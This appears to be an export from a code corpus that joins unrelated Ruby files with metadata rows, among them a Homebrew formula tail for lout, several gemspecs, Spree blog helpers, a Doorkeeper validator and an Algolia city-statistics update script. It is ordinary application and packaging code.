sha256 "3d16f1ce3373ed96419ba57399c2e4d94f88613c2cb4968cb0331ecac3da68bd"
bottle do
sha256 "2de1b1b7526f7427b8a57b6239a5a8c199ee05365ead7ed8d722a9e7e3123a0e" => :high_sierra
sha256 "2cfc68ddba21e6f485a4a57df9e810b6996d5364374c66e77b06d41ce230f060" => :sierra
sha256 "2fbc90ffc3f12312dc11e31996ba94da3b8a4ba1c55f33ca60a5d81aef4e137f" => :el_capitan
sha256 "366023d41536d0220a3d226a9f7a5e65b89fcf8ec212bfd6e53f8c2b4110abce" => :yosemite
sha256 "7cbcdcbf720e5e93c7e8d41861fedbcb0f1b46233414c7897e94671e4e42a9fa" => :mavericks
sha256 "9d3b44fdc1f1aa2f01ece78c63ad8084897d27758cf72cfbdef6f876c0c7a0cb" => :mountain_lion
end
def install
bin.mkpath
man1.mkpath
(doc/"lout").mkpath
system "make", "PREFIX=#{prefix}", "LOUTLIBDIR=#{lib}", "LOUTDOCDIR=#{doc}", "MANDIR=#{man}", "allinstall"
end
test do
input = "test.lout"
(testpath/input).write <<-EOS.undent
@SysInclude { doc }
@Doc @Text @Begin
@Display @Heading { Blindtext }
The quick brown fox jumps over the lazy dog.
@End @Text
EOS
assert_match /^\s+Blindtext\s+The quick brown fox.*\n+$/, shell_output("#{bin}/lout -p #{input}")
end
end
| 39.571429 | 110 | 0.741516 |
914cf42d432970dbc7565857616c20d691b790ef
| 1,594 |
lib = File.expand_path('lib', __dir__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'libhoney/version'
Gem::Specification.new do |spec|
spec.name = 'libhoney'
spec.version = Libhoney::VERSION
spec.summary = 'send data to Honeycomb'
spec.description = 'Ruby gem for sending data to Honeycomb'
spec.authors = ['The Honeycomb.io Team']
spec.email = '[email protected]'
spec.homepage = 'https://github.com/honeycombio/libhoney-rb'
spec.license = 'Apache-2.0'
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
spec.bindir = 'exe'
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.required_ruby_version = '>= 2.4.0'
spec.add_development_dependency 'bump', '~> 0.5'
spec.add_development_dependency 'bundler'
spec.add_development_dependency 'lockstep'
spec.add_development_dependency 'minitest', '~> 5.0'
spec.add_development_dependency 'minitest-reporters'
spec.add_development_dependency 'rake', '~> 13.0'
spec.add_development_dependency 'rubocop', '1.12.1'
spec.add_development_dependency 'sinatra'
spec.add_development_dependency 'sinatra-contrib'
spec.add_development_dependency 'spy', '~> 1.0'
spec.add_development_dependency 'webmock', '~> 3.4'
spec.add_development_dependency 'yard'
spec.add_development_dependency 'yardstick', '~> 0.9'
spec.add_dependency 'addressable', '~> 2.0'
spec.add_dependency 'excon'
spec.add_dependency 'http', '>= 2.0', '< 6.0'
end
| 37.952381 | 74 | 0.70138 |
5df27d0d7bb678ce54013af6cc12141bfd6a46a9
| 2,108 |
module Spree
module BlogEntriesHelper
def post_link_list
link = Struct.new(:name,:url)
BlogEntry.recent.collect { |post| link.new( post.title, blog_entry_permalink(post)) }
end
def blog_entry_split_title(e)
e.split(" ").join("<br/>").html_safe
end
def blog_entry_permalink(e)
unless e.published_at.nil?
blog_entry_permalink_path year: e.published_at.strftime("%Y"), month: e.published_at.strftime("%m"), day: e.published_at.strftime("%d"), slug: e.permalink
else
blog_entry_permalink_path year: "na", month: "na", day: "na", slug: e.permalink
end
end
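    # Illustrative: a post published on 2015-06-01 with permalink "hello-world"
    # produces params year: "2015", month: "06", day: "01", slug: "hello-world";
    # the final path depends on how blog_entry_permalink is routed.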
def blog_entry_url_permalink(e)
unless e.published_at.nil?
blog_entry_permalink_url year: e.published_at.strftime("%Y"), month: e.published_at.strftime("%m"), day: e.published_at.strftime("%d"), slug: e.permalink
else
blog_entry_permalink_url year: "na", month: "na", day: "na", slug: e.permalink
end
end
def blog_full_article_html(blog_entry)
"<br><br>Read the full article #{link_to blog_entry.title, blog_entry_url_permalink(blog_entry)} at #{link_to "#{Spree::current_store.name} Blog", blog_url}."
end
def blog_first_appeared_html(blog_entry)
"<br><br>The article #{link_to blog_entry.title, blog_entry_url_permalink(blog_entry)} first appeared on #{link_to "#{Spree::current_store.name} Blog", blog_url}."
end
def blog_entry_tag_list_html blog_entry
blog_entry.tag_list.map {|tag| link_to tag, blog_tag_path(tag) }.join(", ").html_safe
end
def blog_entry_category_list_html blog_entry
blog_entry.category_list.map {|category| link_to category, blog_category_path(category) }.join(", ").html_safe
end
def tag_cloud(tags, classes)
return [] if tags.blank?
max_count = tags.sort_by(&:count).last.count.to_f
tags.each do |tag|
index = ((tag.count / max_count) * (classes.size - 1))
yield tag, classes[index.nan? ? 0 : index.round]
end
end
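    # Illustrative view usage (CSS class names are hypothetical):
    #   tag_cloud(@tags, %w[tag-sm tag-md tag-lg]) do |tag, css_class|
    #     concat link_to(tag.name, blog_tag_path(tag.name), class: css_class)
    #   end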
def markdown(source)
source.markdown_to_html rescue ''
end
end
end
| 36.344828 | 169 | 0.679317 |
334db2155a9a40c43f41cbdbf9a5a7694d57a1ae
| 1,322 |
require_relative 'boot'
require "rails"
# Pick the frameworks you want:
require "active_model/railtie"
require "active_job/railtie"
require "active_record/railtie"
require "active_storage/engine"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_mailbox/engine"
require "action_text/engine"
require "action_view/railtie"
require "action_cable/engine"
# require "sprockets/railtie"
require "rails/test_unit/railtie"
require 'json'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module Backend
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 6.0
# Settings in config/environments/* take precedence over those specified here.
# Application configuration can go into files in config/initializers
# -- all .rb files in that directory are automatically loaded after loading
# the framework and any gems in your application.
# Only loads a smaller set of middleware suitable for API only apps.
# Middleware like session, flash, cookies can be added back manually.
# Skip views, helpers and assets when generating a new resource.
config.api_only = true
end
end
| 33.897436 | 82 | 0.776853 |
f753f12ff2048091fa5cbdb0bb404ea8d095cc0d
| 1,325 |
# coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'runnerbean/version'
Gem::Specification.new do |spec|
spec.name = 'runnerbean'
spec.version = Runnerbean::VERSION
spec.authors = ['baob']
spec.email = ['[email protected]']
spec.summary = 'Automates starting and stopping processes for testing.'
# spec.description = %q{TODO: Write a longer description. Optional.}
spec.homepage = ''
spec.license = 'MIT'
spec.files = `git ls-files -z`.split("\x0")
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ['lib']
spec.add_development_dependency 'bundler', '~> 1.7'
spec.add_development_dependency 'rake', '~> 10.0'
spec.add_development_dependency 'rspec'
spec.add_development_dependency 'guard'
spec.add_development_dependency 'guard-rspec'
spec.add_development_dependency 'terminal-notifier-guard'
spec.add_development_dependency 'rubocop'
spec.add_development_dependency 'guard-rubocop'
spec.add_development_dependency 'guard-bundler'
spec.add_development_dependency 'pry'
spec.add_development_dependency 'codeclimate-test-reporter'
end
| 40.151515 | 79 | 0.710943 |
4a6a16ce8e28a1dc02e04921a5327c18956951f2
| 104 |
Solitr::Application.routes.draw do
root :to => "play#index"
get ':action', :controller => :play
end
| 20.8 | 37 | 0.673077 |
21e20effc83bad6159dc3f04e32936cc89f74083
| 1,073 |
require 'doorkeeper/validations'
require 'doorkeeper/oauth/scopes'
require 'doorkeeper/oauth/helpers/scope_checker'
module Doorkeeper
module OAuth
class ClientCredentialsRequest
class Validation
include Validations
include OAuth::Helpers
validate :client, error: :invalid_client
validate :scopes, error: :invalid_scope
def initialize(server, request)
@server, @request, @client = server, request, request.client
validate
end
private
def validate_client
@client.present?
end
def validate_scopes
return true unless @request.scopes.present?
application_scopes = if @client.present?
@client.application.scopes
else
''
end
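          # The requested scopes must be permitted by the server and, when the
          # application declares its own scopes, by the application as well.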
ScopeChecker.valid?(
@request.scopes.to_s,
@server.scopes,
application_scopes
)
end
end
end
end
end
| 23.326087 | 70 | 0.54986 |
03333cc2dd2c9ffa174e1c749ad8ada9b1b3c956
| 742 |
Spree::ProductsController.class_eval do
include Spree::EventTrackerController
after_action :create_event_on_intercom, only: [:show, :index], if: :product_search_conditions_satisfied?
private
def show_data
{
product_id: @product.id,
time: Time.current.to_i,
user_id: spree_current_user.id
}
end
def index_data
{
filter: @searcher.search.to_s,
keyword: params[:keywords],
taxon_id: params[:taxon],
time: Time.current.to_i,
user_id: spree_current_user.id
}
end
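  # Index views are only tracked when the visitor actually searched or
  # filtered; show views are always tracked.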
def product_search_conditions_satisfied?
return true unless action_name == 'index'
params[:keywords].present? || @searcher.search.present?
end
end
| 22.484848 | 106 | 0.654987 |
edcd552ba45e8e7386ca9ac5d32733ff47888cf0
| 2,420 |
require_relative '../config/keys.local.rb'
require 'csv'
require 'uri'
require 'net/http'
require 'json'
require 'pg'
require 'openssl'
require 'algoliasearch'
require 'wannabe_bool'
db=PG.connect(
"dbname"=>PGNAME,
"user"=>PGUSER,
"password"=>PGPWD,
"host"=>PGHOST,
"port"=>PGPORT
)
Algolia.init :application_id=>ALGOLIA_ID, :api_key=>ALGOLIA_KEY
index_villes=Algolia::Index.new("villes")
all_cities_list=<<END
select z.population, z.lon_deg,z.lat_deg,z.city_id, z.zipcode, z.slug, count(*) as nb_supporters,(100*(count(*)::float/z.population::float))::numeric(5,3) as taux from (select city_id, zipcode, slug,lon_deg,lat_deg,population from cities group by slug,lon_deg,lat_deg,population,zipcode,city_id) as z inner join citizens as c on (c.city_id=z.city_id) group by z.city_id,z.zipcode, z.slug, z.lat_deg, z.lon_deg, z.population;
END
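# all_cities_list: supporter count and rate ("taux", as a percentage of the
# population) for every city.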
big_cities_list=<<END
select z.population, z.lon_deg,z.lat_deg,z.city_ids, z.zipcodes, z.slug, count(*) as nb_supporters,(100*(count(*)::float/z.population::float))::numeric(5,3) as taux from (select array_agg(cities.city_id) as city_ids, array_agg(zipcode) as zipcodes, slug,lon_deg,lat_deg,population from cities group by slug,lon_deg,lat_deg,population) as z inner join citizens as c on (array_length(z.city_ids,1)>1 AND c.city_id::int = ANY (z.city_ids::int[])) group by z.city_ids,z.zipcodes, z.slug, z.lat_deg, z.lon_deg, z.population;
END
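# big_cities_list: the same figures for cities whose slug spans several
# city_id/zipcode rows, so their duplicates can be merged into one record.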
updates=[]
res=db.exec(all_cities_list)
if not res.num_tuples.zero? then
res.each do |r|
updates.push({
"_geoloc"=>{"lat"=>r['lat_deg'].to_f,"lng"=>r['lon_deg'].to_f},
"nb_supporters"=>r['nb_supporters'],
"taux"=>r['taux'],
"objectID"=>r['city_id']
})
puts "updating #{r['slug']}"
end
end
index_villes.partial_update_objects(updates)
updates=[]
res=db.exec(big_cities_list)
if not res.num_tuples.zero? then
res.each do |r|
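  # city_ids and zipcodes arrive as Postgres array literals such as "{123,456}";
  # swapping the braces for brackets and eval-ing them yields plain Ruby arrays.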
object_ids=eval(r['city_ids'].gsub('{','[').gsub('}',']'))
zipcodes=eval(r['zipcodes'].gsub('{','[').gsub('}',']'))
zipcodes_text=zipcodes.join(', ')
first=object_ids[0]
puts "using #{first} as first"
object_ids.each do |a|
puts "deleting #{a}" if a!=first
index_villes.delete_object(a) if a!=first
end
updates.push({
"zipcode"=>zipcodes_text,
"_geoloc"=>{"lat"=>r['lat_deg'].to_f,"lng"=>r['lon_deg'].to_f},
"nb_supporters"=>r['nb_supporters'],
"taux"=>r['taux'],
"objectID"=>first.to_s
})
end
end
index_villes.partial_update_objects(updates)
| 38.412698 | 519 | 0.709504 |